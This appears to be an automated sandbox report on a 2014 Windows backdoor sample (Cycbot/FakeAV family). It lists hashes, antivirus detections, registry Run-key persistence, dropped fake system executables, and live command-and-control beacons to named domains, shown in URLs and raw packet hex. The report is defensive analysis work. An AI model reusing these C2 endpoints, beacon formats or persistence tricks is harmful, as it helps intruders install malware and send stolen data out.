Analysis Date2014-06-16 00:29:56
MD56b93ccca7f9de8161acac7960ccaf5fa
SHA14fbc639361826a2551cb2386528cb3d0310e291a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 9f3b667298691183610abef5376b00d1 sha1: 98cc0d6309a3e8f222d5be33c1345e6b0382a586 size: 167936
Section.rdata md5: 1515eb278877563d4d2c213b797aa9a1 sha1: 719de45f9162ebe314c8d3e5007adcf3e96094ae size: 2048
Section.data md5: dbae3777910393599cabf875f0e5f005 sha1: 079a7e2af78311479efb2680fda44f2783036115 size: 20480
Section.tls md5: 334e1c5c8a9439cfcfdf1f1d096467b8 sha1: 54676a9efa0bbbf21913b9c7db1772bffc8f0c42 size: 512
Timestamp2005-09-01 14:29:56
VersionPrivateBuild: 1474
PEhash6eb7df2c2c25a8bff61f36591312f5f4ce471868
IMPhash67de8074d9f608cce971e9d5370c80fd
AV360 SafeTrojan.Generic.5508835
AV360 SafeTrojan.Generic.5508835
AVAd-AwareTrojan.Generic.5508835
AVAd-AwareTrojan.Generic.5508835
AVAlwil (avast)Cybota [Trj]
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Kazy.14157.psa
AVAvira (antivir)TR/Kazy.14157.psa
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Cycbot-9
AVClamAVTrojan.Cycbot-9
AVDr. WebTrojan.DownLoad2.21894
AVDr. WebTrojan.DownLoad2.21894
AVEmsisoftTrojan.Generic.5508835
AVEmsisoftTrojan.Generic.5508835
AVEset (nod32)Win32/Kryptik.LDT
AVEset (nod32)Win32/Kryptik.LDT
AVFortinetW32/FraudLoad.MK!tr
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureTrojan.Generic.5508835
AVF-SecureTrojan.Generic.5508835
AVGrisoft (avg)Cryptic.CFW
AVGrisoft (avg)Cryptic.CFW
AVIkarusTrojan-Spy.Win32.Zbot
AVIkarusTrojan-Spy.Win32.Zbot
AVKasperskyBackdoor.Win32.Gbot.aci
AVKasperskyBackdoor.Win32.Gbot.aci
AVMalwareBytesSpyware.Passwords.XGen
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.i
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Trojan.Generic.5508835
AVMicroWorld (escan)Trojan.Generic.5508835
AVNormanwinpe/Cycbot.BP
AVNormanwinpe/Cycbot.BP
AVRisingno_virus
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SME3
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Trojan.Diple

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSordergreentee.com
Winsock DNS127.0.0.1
Winsock DNSrealsoftwaredevelopment.com
Winsock DNScofeeandteeshop.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSrealsoftwaredevelopment.com
Type: A
141.101.116.129
DNSrealsoftwaredevelopment.com
Type: A
141.101.117.129
DNSzonetf.com
Type: A
208.73.211.164
DNSzonetf.com
Type: A
208.73.211.249
DNSzonetf.com
Type: A
208.73.211.236
DNSzonetf.com
Type: A
208.73.211.182
DNSzonetf.com
Type: A
208.73.211.177
DNSzonetf.com
Type: A
208.73.211.177
DNSzonetf.com
Type: A
208.73.211.164
DNSzonetf.com
Type: A
208.73.211.249
DNSzonetf.com
Type: A
208.73.211.236
DNSzonetf.com
Type: A
208.73.211.182
DNSordergreentee.com
Type: A
DNScofeeandteeshop.com
Type: A
HTTP GEThttp://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif?v14=53&tq=gKZEtzyH5C6HzpJO%2Bfd2kbeR40bEcQtYFgXODKxz7nG13v61ixwdMIq01KyvHC5Lkh%2FYiwyYUJaIMH0%2Bd7d0mhykLS2VG600fNlm32TdLQ%2Fp3ZBR5kuj4N%2BIFyvbggk8%2BMSfJEcqpl9ACNnX%2BTpRM2WJoUksedSKJGOshCVp1uc00Lv4yyYnpDCP%2BfeuGXGHJkg1GYGA3UkuV8hbfoBMYcJBP7lJi3IaFMShAu2X3%2FcVuGEpMdtpfp1HhPBm6lfsFnqZXsuX%2BYNSGSiJC5jmJSMK%2BF6tUKUlSexEU62nTF%2FMmJBkIktqbAXytEXF6MvszXvL%2BAWw%2Bw6sURqimGRdfZdn31hX0V4qw8sVenWaI%2FGaaUlqkHYocGoQi%2BgKIL3GS0vL6V9M4cq9A45kLPKzaw%2BV4IcHAY0pgmCVczUvWuv9Mnw
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 141.101.116.129:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.164:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.177:80

Raw Pcap
0x00000000 (00000)   47455420 2f57696e 646f7773 4c697665   GET /WindowsLive
0x00000010 (00016)   57726974 65722f77 65622d32 5f305f74   Writer/web-2_0_t
0x00000020 (00032)   68756d62 5f312e67 69663f76 31343d35   humb_1.gif?v14=5
0x00000030 (00048)   33267471 3d674b5a 45747a79 48354336   3&tq=gKZEtzyH5C6
0x00000040 (00064)   487a704a 4f253242 6664326b 62655234   HzpJO%2Bfd2kbeR4
0x00000050 (00080)   30624563 51745946 67584f44 4b787a37   0bEcQtYFgXODKxz7
0x00000060 (00096)   6e473133 76363169 7877644d 49713031   nG13v61ixwdMIq01
0x00000070 (00112)   4b797648 43354c6b 68253246 59697779   KyvHC5Lkh%2FYiwy
0x00000080 (00128)   59554a61 494d4830 25324264 3764306d   YUJaIMH0%2Bd7d0m
0x00000090 (00144)   68796b4c 53325647 36303066 4e6c6d33   hykLS2VG600fNlm3
0x000000a0 (00160)   3254644c 51253246 70335a42 52356b75   2TdLQ%2Fp3ZBR5ku
0x000000b0 (00176)   6a344e25 32424946 79766267 676b3825   j4N%2BIFyvbggk8%
0x000000c0 (00192)   32424d53 664a4563 71706c39 41434e6e   2BMSfJEcqpl9ACNn
0x000000d0 (00208)   58253242 5470524d 32574a6f 556b7365   X%2BTpRM2WJoUkse
0x000000e0 (00224)   64534b4a 474f7368 43567031 75633030   dSKJGOshCVp1uc00
0x000000f0 (00240)   4c763479 79596e70 44435025 32426665   Lv4yyYnpDCP%2Bfe
0x00000100 (00256)   75475847 484a6b67 31475947 4133556b   uGXGHJkg1GYGA3Uk
0x00000110 (00272)   75563868 62666f42 4d59634a 4250376c   uV8hbfoBMYcJBP7l
0x00000120 (00288)   4a693349 61464d53 68417532 58332532   Ji3IaFMShAu2X3%2
0x00000130 (00304)   46635675 4745704d 64747066 70314868   FcVuGEpMdtpfp1Hh
0x00000140 (00320)   50426d36 6c667346 6e715a58 73755825   PBm6lfsFnqZXsuX%
0x00000150 (00336)   3242594e 53475369 4a43356a 6d4a534d   2BYNSGSiJC5jmJSM
0x00000160 (00352)   4b253242 46367455 4b556c53 65784555   K%2BF6tUKUlSexEU
0x00000170 (00368)   36326e54 46253246 4d6d4a42 6b496b74   62nTF%2FMmJBkIkt
0x00000180 (00384)   71624158 79744558 46364d76 737a5876   qbAXytEXF6MvszXv
0x00000190 (00400)   4c253242 41577725 32427736 73555271   L%2BAWw%2Bw6sURq
0x000001a0 (00416)   696d4752 64665a64 6e333168 58305634   imGRdfZdn31hX0V4
0x000001b0 (00432)   71773873 56656e57 61492532 46476161   qw8sVenWaI%2FGaa
0x000001c0 (00448)   556c716b 48596f63 476f5169 25324267   UlqkHYocGoQi%2Bg
0x000001d0 (00464)   4b494c33 47533076 4c365639 4d346371   KIL3GS0vL6V9M4cq
0x000001e0 (00480)   39413435 6b4c504b 7a617725 32425634   9A45kLPKzaw%2BV4
0x000001f0 (00496)   49634841 59307067 6d435663 7a557657   IcHAY0pgmCVczUvW
0x00000200 (00512)   7576394d 6e772048 5454502f 312e300d   uv9Mnw HTTP/1.0.
0x00000210 (00528)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000220 (00544)   73650d0a 486f7374 3a207265 616c736f   se..Host: realso
0x00000230 (00560)   66747761 72656465 76656c6f 706d656e   ftwaredevelopmen
0x00000240 (00576)   742e636f 6d0d0a41 63636570 743a202a   t.com..Accept: *
0x00000250 (00592)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000260 (00608)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e735825 32425039 68253242 49307344   NsX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a43356a 6d4a534d   close....C5jmJSM
0x00000160 (00352)   4b253242 46367455 4b556c53 65784555   K%2BF6tUKUlSexEU
0x00000170 (00368)   36326e54 46253246 4d6d4a42 6b496b74   62nTF%2FMmJBkIkt
0x00000180 (00384)   71624158 79744558 46364d76 737a5876   qbAXytEXF6MvszXv
0x00000190 (00400)   4c253242 41577725 32427736 73555271   L%2BAWw%2Bw6sURq
0x000001a0 (00416)   696d4752 64665a64 6e333168 58305634   imGRdfZdn31hX0V4
0x000001b0 (00432)   71773873 56656e57 61492532 46476161   qw8sVenWaI%2FGaa
0x000001c0 (00448)   556c716b 48596f63 476f5169 25324267   UlqkHYocGoQi%2Bg
0x000001d0 (00464)   4b494c33 47533076 4c365639 4d346371   KIL3GS0vL6V9M4cq
0x000001e0 (00480)   39413435 6b4c504b 7a617725 32425634   9A45kLPKzaw%2BV4
0x000001f0 (00496)   49634841 59307067 6d435663 7a557657   IcHAY0pgmCVczUvW
0x00000200 (00512)   7576394d 6e772048 5454502f 312e300d   uv9Mnw HTTP/1.0.
0x00000210 (00528)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000220 (00544)   73650d0a 486f7374 3a207265 616c736f   se..Host: realso
0x00000230 (00560)   66747761 72656465 76656c6f 706d656e   ftwaredevelopmen
0x00000240 (00576)   742e636f 6d0d0a41 63636570 743a202a   t.com..Accept: *
0x00000250 (00592)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000260 (00608)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e735825 32425039 68253242 49307344   NsX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a43356a 6d4a534d   ose......C5jmJSM
0x00000160 (00352)   4b253242 46367455 4b556c53 65784555   K%2BF6tUKUlSexEU
0x00000170 (00368)   36326e54 46253246 4d6d4a42 6b496b74   62nTF%2FMmJBkIkt
0x00000180 (00384)   71624158 79744558 46364d76 737a5876   qbAXytEXF6MvszXv
0x00000190 (00400)   4c253242 41577725 32427736 73555271   L%2BAWw%2Bw6sURq
0x000001a0 (00416)   696d4752 64665a64 6e333168 58305634   imGRdfZdn31hX0V4
0x000001b0 (00432)   71773873 56656e57 61492532 46476161   qw8sVenWaI%2FGaa
0x000001c0 (00448)   556c716b 48596f63 476f5169 25324267   UlqkHYocGoQi%2Bg
0x000001d0 (00464)   4b494c33 47533076 4c365639 4d346371   KIL3GS0vL6V9M4cq
0x000001e0 (00480)   39413435 6b4c504b 7a617725 32425634   9A45kLPKzaw%2BV4
0x000001f0 (00496)   49634841 59307067 6d435663 7a557657   IcHAY0pgmCVczUvW
0x00000200 (00512)   7576394d 6e772048 5454502f 312e300d   uv9Mnw HTTP/1.0.
0x00000210 (00528)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000220 (00544)   73650d0a 486f7374 3a207265 616c736f   se..Host: realso
0x00000230 (00560)   66747761 72656465 76656c6f 706d656e   ftwaredevelopmen
0x00000240 (00576)   742e636f 6d0d0a41 63636570 743a202a   t.com..Accept: *
0x00000250 (00592)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000260 (00608)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....


Strings
.
....A>.+
G&
#^<..>.o..G...$
(J..iA.
..-.r...w..N1...
{.
!.^...
......3va...
.T..8.|....'6.m{kArO
.
D.....QO.>.5O}B
TH...].TN..
P
T
|mW?.Q_K
VN{W[.
.N...u
.[..G......
U.F:Z?
(.5....;.
.*
.}z...u..A...
..c:B.
q.
/
...

040904b0
1474
HFGa
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
0[{"D?
0dx o_
4I4jYW
{4Jt\A
5'@fNj
5/lW[4
73y"8=G
];.7q=q
;'A3c<:
ADVAPI32.dll
CancelIo
CM_Get_DevNode_Status
CMP_WaitNoPendingInstallEvents
cQ`U6YN
CreateDialogParamA
CreateFiber
CreateSemaphoreA
CryptCreateHash
CryptDestroyHash
CryptDestroyKey
CryptEncrypt
CryptGetHashParam
CryptHashData
CryptImportKey
CryptReleaseContext
c#S4	<uS
]CZ@=D
d1KUVo
@.data
DestroyWindow
DispatchMessageA
e5KjILK@'A>
EnumResourceNamesW
fnX/Tdb
*Fvd9F(
GetACP
GetCurrentThread
GetCurrentThreadId
GetDesktopWindow
GetLastError
GetQueueStatus
GetSystemTime
GetThreadPriority
GetTickCount
GetUserNameA
$	/?h\
}h<+Hg~>
(=;hoA
(>h{Q)
H^XrAV
-i5u\r
I9t*zvc
ie%A(}
IG@S9q
InternetCloseHandle
InternetOpenA
InternetOpenUrlA
InternetReadFile
IQPf/m>
IsBadReadPtr
=iwn,:
_? jFN
JhA2Wi
>JiIT+
JRichu
JT^jl5'
JxwE.p
.KB	!-
KERNEL32.dll
<-k{SY
/L(>OI
Lo X>=
lstrcatA
`m>8wE_
?Mj(9|
MJ<_O`
m_J))xT
MsgWaitForMultipleObjects
mUyYPkhO
N90:<(|D
NK.xR7~ar
ny7^9N_
<o_|l?
|oxx	Hk
P@A8ce
PeekMessageA
p_L&rH
PostThreadMessageA
#.q pEE0
Q	<qJy
`.rdata
RealGetWindowClassA
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
ritl	,
-s7VwYh
SetThreadPriority
SETUPAPI.dll
SetupDiGetDeviceRegistryPropertyW
ShowWindow
 }SO3"
sT,?QQ
_:t5*C
!This program cannot be run in DOS mode.
timeGetTime
timeSetEvent
<Tn58d
u)0&bG
u5uZ;#
UJ';T>
uMw]vG>"
USER32.dll
VirtualFree
V@+N3.^
WaitForMultipleObjects
WININET.dll
WINMM.dll
wsprintfA
w,tyvtV
wvsprintfA
"xD&)/1
XtjO5?*g
!~|^y"
[y47N&
Y?*J{1
z.	/|.